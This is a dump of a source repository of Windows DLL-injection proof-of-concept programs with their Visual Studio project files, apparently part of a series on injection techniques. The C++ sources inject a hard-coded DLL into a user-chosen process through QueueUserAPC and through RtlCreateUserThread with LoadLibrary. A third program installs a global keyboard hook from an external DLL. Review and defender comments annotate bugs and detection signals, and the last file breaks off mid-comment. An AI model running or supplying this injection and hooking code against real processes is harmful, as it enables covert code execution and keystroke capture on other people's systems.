true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 
-------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. 
In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-QueueUserAPC", "DLLInjection-QueueUserAPC\DLLInjection-QueueUserAPC.vcxproj", "{441CCAD0-919A-4882-87A6-DB9834766DC4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x64.ActiveCfg = Debug|x64 17 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x64.Build.0 = Debug|x64 18 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x86.Build.0 = Debug|Win32 20 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x64.ActiveCfg = Release|x64 21 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x64.Build.0 = Release|x64 22 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x86.ActiveCfg = Release|Win32 23 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {2805A189-2E03-42F8-B8BF-2D9769C5464F} 30 | 
EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.cpp:
--------------------------------------------------------------------------------
// DLLInjection-QueueUserAPC.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
// Review notes: this listing was reconstructed from a collapsed page dump; the
// header names of the four system includes below were lost in extraction.

#include "pch.h"
#include
#include
#include
#include

// Queues a LoadLibraryW APC to every thread of the process with PID `process`
// so that each thread loads the DLL at the hard-coded path the next time it
// enters an alertable wait. Returns 1 if the process could not be opened,
// remote memory could not be allocated or written, LoadLibraryW could not be
// resolved, or the thread snapshot failed; otherwise returns 0, even when no
// thread accepted the APC.
//
// Defender note: no thread is created in the target, so detection cannot rely
// on thread-creation events for this variant. The observable events are the
// cross-process OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE), the
// remote memory write, repeated OpenThread(THREAD_SET_CONTEXT) against another
// process's threads, and the eventual image load of the DLL in the target.
//
// Review findings (documented, not fixed):
//  - The first thread returned by Thread32First is never inspected: the loop
//    calls Thread32Next before checking the entry.
//  - Error paths return 1, but main() tests for -1, so "Could not inject into
//    PID" is never printed.
//  - hProcess (and, once taken, hSnapshot) are leaked on the error paths.
//  - The error text names LoadLibraryA while the lookup is for LoadLibraryW
//    (runtime string, left unchanged).
//  - printf(TEXT(...)) yields wide literals under a Unicode CharacterSet, which
//    printf does not accept; presumably only the MultiByte configuration
//    compiles this cleanly — confirm against the vcxproj.
//  - getchar() inside the loop blocks once per thread that could be opened.
int injectIntoPID(int process)
{
    DWORD pid = (DWORD)process;
    // const char* dll = "C:\\v.dll";
    PCWSTR pszLibFile = L"C:\\v.dll";
    // Byte count of the path including the terminating NUL (unlike the
    // strlen-based variants elsewhere in this repository).
    int cb = (lstrlenW(pszLibFile) + 1) * sizeof(wchar_t);


    //Gets the process handle for the target process
    // Only the two rights needed for VirtualAllocEx/WriteProcessMemory are requested.
    HANDLE hProcess = OpenProcess(
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE,
        FALSE, pid);
    if (hProcess == NULL)
    {
        printf(TEXT("[-] Error: Could not open process for PID (%d).\n"), pid);
        return(1);
    }


    // Commit a RW region in the target for the wide path string.
    LPVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
    if (pszLibFileRemote == NULL)
    {
        printf(TEXT("[-] Error: Could not allocate memory inside PID (%d).\n"), pid);
        // NOTE(review): hProcess leaked.
        return(1);
    }

    // Resolve LoadLibraryW locally; kernel32 is assumed to be at the same base in
    // the target. NOTE(review): the message below says LoadLibraryA.
    LPVOID pfnThreadRtn = (LPVOID)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
    if (pfnThreadRtn == NULL)
    {
        printf(TEXT("[-] Error: Could not find LoadLibraryA function inside kernel32.dll library.\n"));
        return(1);
    }

    DWORD n = WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, cb, NULL);
    if (n == 0)
    {
        printf(TEXT("[-] Error: Could not write any bytes into the PID (%d) address space.\n"), pid);
        return(1);
    }

    // System-wide thread snapshot; filtered to the target PID below.
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
        printf(TEXT("[-] Error: Unable to get thread information\n"));
        return(1);
    }

    DWORD threadId = 0;
    THREADENTRY32 threadEntry;
    threadEntry.dwSize = sizeof(THREADENTRY32);

    // NOTE(review): the entry filled in by Thread32First is overwritten by
    // Thread32Next before it is examined, so the first thread is skipped.
    BOOL bResult = Thread32First(hSnapshot, &threadEntry);
    while (bResult)

    {
        bResult = Thread32Next(hSnapshot, &threadEntry);
        if (bResult)
        {
            if (threadEntry.th32OwnerProcessID == pid)
            {
                threadId = threadEntry.th32ThreadID;

                printf(TEXT("[+] Using thread: %i\n"), threadId);
                // THREAD_SET_CONTEXT is the right QueueUserAPC requires on the thread handle.
                HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, threadId);
                if (hThread == NULL)
                    printf(TEXT("[-] Error: Can't open thread. Continuing to try other threads...\n"));
                else
                {
                    // The APC runs LoadLibraryW(pszLibFileRemote) in the target thread
                    // the next time that thread enters an alertable wait; success here
                    // means "queued", not "loaded".
                    DWORD dwResult = QueueUserAPC((PAPCFUNC)pfnThreadRtn, hThread, (ULONG_PTR)pszLibFileRemote);
                    if (!dwResult)
                        printf(TEXT("[-] Error: Couldn't call QueueUserAPC on thread> Continuing to try othrt threads...\n"));
                    else
                        printf(TEXT("[+] Success: DLL injected via QueueUserAPC().\n"));
                    getchar();
                    CloseHandle(hThread);
                }
            }
        }
    }

    if (!threadId)
        printf(TEXT("[-] Error: No threads found in thr target process\n"));

    CloseHandle(hSnapshot);
    CloseHandle(hProcess);

    return(0);
}

// Entry point: reads a PID from stdin, calls injectIntoPID, prints a failure
// message when it returns -1, then runs `pause` through system().
//
// Review findings (documented, not fixed): injectIntoPID returns 1 on error,
// never -1, so the failure message is unreachable; `char* argv` is a
// non-standard signature (argv should be char**; it is unused); scanf_s("%u")
// reads into an int.
int main(int argc, char* argv)
{
    int pid;
    puts("Inject into which PID: ");
    scanf_s("%u", &pid);
    puts("Method used to attach thread is : QueueUserAPC");
    int result = injectIntoPID(pid);
    if (result == -1)
    {
        puts("Could not inject into PID");
    }
    system("pause");
}
--------------------------------------------------------------------------------
/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.vcxproj:
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 |
{441CCAD0-919A-4882-87A6-DB9834766DC4} 24 | Win32Proj 25 | DLLInjectionQueueUserAPC 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | 
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. 
In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-RtlCreateUserThread", "DLLInjection-RtlCreateUserThread\DLLInjection-RtlCreateUserThread.vcxproj", "{43772772-9FB1-4E36-B862-4347375C4D2C}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x64.ActiveCfg = Debug|x64 17 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x64.Build.0 = Debug|x64 18 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x86.ActiveCfg = Debug|Win32 19 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x86.Build.0 = Debug|Win32 20 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x64.ActiveCfg = Release|x64 21 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x64.Build.0 = Release|x64 22 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x86.ActiveCfg = Release|Win32 23 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = 
{5BA9F0A7-D4FB-45AC-8616-C917093DBFF5} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-RtlCreateUserThread.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | // ConsoleApplication2.cpp : This file contains the 'main' function. Program execution begins and ends there. 5 | // 6 | 7 | #include "pch.h" 8 | #include 9 | #include 10 | #include 11 | /* RtlCreateUserThread (wrapper): resolves ntdll!RtlCreateUserThread at run time and asks it to start a thread in hProcess at lpBaseAddress with lpSpace as the thread parameter. Returns the handle written back through the out-parameter, or NULL when ntdll or the export cannot be resolved. */ 12 | HANDLE RtlCreateUserThread( 13 | HANDLE hProcess, 14 | LPVOID lpBaseAddress, 15 | LPVOID lpSpace 16 | ) 17 | { 18 | //The prototype of RtlCreateUserThread from undocumented.ntinternals.com 19 | typedef DWORD(WINAPI * functypeRtlCreateUserThread)( 20 | HANDLE ProcessHandle, 21 | PSECURITY_DESCRIPTOR SecurityDescriptor, 22 | BOOL CreateSuspended, 23 | ULONG StackZeroBits, 24 | PULONG StackReserved, 25 | PULONG StackCommit, 26 | LPVOID StartAddress, 27 | LPVOID StartParameter, 28 | HANDLE ThreadHandle, /* NOTE(review): declared as HANDLE, but the call below passes &hRemoteThread, i.e. it is used as an out-pointer */ 29 | LPVOID ClientID 30 | ); 31 | //Get handle for ntdll which contains RtlCreateUserThread 32 | HANDLE hRemoteThread = NULL; 33 | HMODULE hNtDllModule = GetModuleHandle("ntdll.dll"); 34 | if (hNtDllModule == NULL) 35 | { 36 | return NULL; 37 | } 38 | functypeRtlCreateUserThread funcRtlCreateUserThread = (functypeRtlCreateUserThread)GetProcAddress(hNtDllModule, "RtlCreateUserThread"); 39 | if (!funcRtlCreateUserThread) 40 | { 41 | return NULL; 42 | } 43 | /* The status returned by the call is discarded and lastError is never read, so a failed creation is only visible through hRemoteThread staying NULL. */ funcRtlCreateUserThread(hProcess, NULL, 0, 0, 0, 0, lpBaseAddress, lpSpace, 44 | &hRemoteThread, NULL); 45 | DWORD lastError = GetLastError(); 46 | return hRemoteThread; 47 | } 48 | 49 | 50 | /* injectIntoPID: writes the hard-coded path "C:\\v.dll" into the target process and starts a remote thread at kernel32!LoadLibraryA with that buffer as its argument. Returns -1 on failure and 0 on success. */ 51 | int injectIntoPID(int process) 52 | { 53 | DWORD pid = (DWORD)process; 54 | const char* dll = "C:\\v.dll"; 55 | //Gets the process handle for the target 
process 56 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 57 | /* NOTE(review): this compares the address of the OpenProcess function with NULL, not hProcess, and the branch does not return; a NULL hProcess flows into every call below. */ if (OpenProcess == NULL) 58 | { 59 | puts("Could not find process"); 60 | } 61 | //Retrieves kernel32.dll module handle for getting loadlibrary base address 62 | HMODULE hModule = GetModuleHandle("kernel32.dll"); 63 | //Gets address for LoadLibraryA in kernel32.dll 64 | LPVOID lpBaseAddress = (LPVOID)GetProcAddress(hModule, "LoadLibraryA"); 65 | if (lpBaseAddress == NULL) 66 | { 67 | puts("Unable to locate LoadLibraryA"); 68 | return -1; 69 | } 70 | //Allocates space inside for inject.dll to our target process 71 | LPVOID lpSpace = (LPVOID)VirtualAllocEx(hProcess, NULL, strlen(dll), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 72 | if (lpSpace == NULL) 73 | { 74 | printf("Could not allocate memory in process %u", (int)process); 75 | return -1; 76 | } 77 | //Write inject.dll to memory of process 78 | int n = WriteProcessMemory(hProcess, lpSpace, dll, strlen(dll), NULL); 79 | if (n == 0) 80 | { 81 | puts("Could not write to process's address space"); 82 | return -1; 83 | } 84 | /* NOTE(review): hThread is never closed, and hProcess is closed only on the success path; the -1 returns above and below leak it. */ HANDLE hThread; 85 | hThread = RtlCreateUserThread(hProcess, lpBaseAddress, lpSpace); 86 | 87 | if (hThread == NULL) 88 | { 89 | return -1; 90 | } 91 | else 92 | { 93 | DWORD threadId = GetThreadId(hThread); 94 | DWORD processId = GetProcessIdOfThread(hThread); 95 | printf("Injected thread id: %u for pid: %u", threadId, processId); 96 | getchar(); 97 | getchar(); 98 | getchar(); 99 | CloseHandle(hProcess); 100 | return 0; 101 | } 102 | } 103 | /* main: reads a PID from stdin and calls injectIntoPID. NOTE(review): argv is declared char* rather than char**, and pid is an int read with %u. */ 104 | int main(int argc, char* argv) 105 | { 106 | int pid; 107 | puts("Inject into which Process ID: "); 108 | scanf_s("%u", &pid); 109 | puts("Method used here is - RtlCreateUserThread"); 110 | int result = injectIntoPID(pid); 111 | if (result == -1) 112 | { 113 | puts("Could not inject into PID"); 114 | } 115 | system("pause"); 116 | } 117 | -------------------------------------------------------------------------------- 
/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {43772772-9FB1-4E36-B862-4347375C4D2C} 24 | Win32Proj 25 | DLLInjectionRtlCreateUserThread 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- 
/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. 
In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-SetWindowsHookEx", "DLLInjection-SetWindowsHookEx\DLLInjection-SetWindowsHookEx.vcxproj", "{8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x64.ActiveCfg = Debug|x64 17 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x64.Build.0 = Debug|x64 18 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x86.ActiveCfg = Debug|Win32 19 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x86.Build.0 = Debug|Win32 20 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x64.ActiveCfg = Release|x64 21 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x64.Build.0 = Release|x64 22 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x86.ActiveCfg = Release|Win32 23 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {10CC855F-CB4D-4E4B-8587-6B17D28367A5} 
30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-SetWindowsHookEx.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | /* _tmain: loads C:\\PoC_Dll.dll into this process, resolves its "poc" export and installs it as a WH_KEYBOARD hook. Returns -1 when the DLL or the export cannot be loaded; otherwise waits for Enter, removes the hook and returns 0. */ 14 | int _tmain(int argc, _TCHAR* argv[]) 15 | { 16 | 17 | /* 18 | * Load library in which we'll be hooking our functions. 19 | */ 20 | HMODULE dll = LoadLibrary("C:\\PoC_Dll.dll"); 21 | if (dll == NULL) { 22 | printf("The DLL could not be found.\n"); 23 | getchar(); 24 | return -1; 25 | } 26 | 27 | /* 28 | * Get the address of the function inside the DLL. 29 | */ 30 | /* NOTE(review): PoC_Dll.cpp exports poc as BOOL poc() with no parameters, so casting it to HOOKPROC is a signature mismatch; the hook arguments are never consumed and CallNextHookEx is not called. */ HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "poc"); 31 | if (addr == NULL) { 32 | printf("The function was not found.\n"); 33 | getchar(); 34 | return -1; 35 | } 36 | 37 | /* 38 | * Window name 39 | */ 40 | /* NOTE(review): targetWnd is not checked for NULL, and neither targetWnd nor procID is used afterwards - both are dead values. */ unsigned long procID; 41 | HWND targetWnd = FindWindow(NULL, "notepad++"); 42 | GetWindowThreadProcessId(targetWnd, &procID); 43 | 44 | /* 45 | * Hook the function. 46 | */ 47 | HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, 0); 48 | //HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, keyboard_hook, dll, 0); 49 | if (handle == NULL) { /* NOTE(review): on 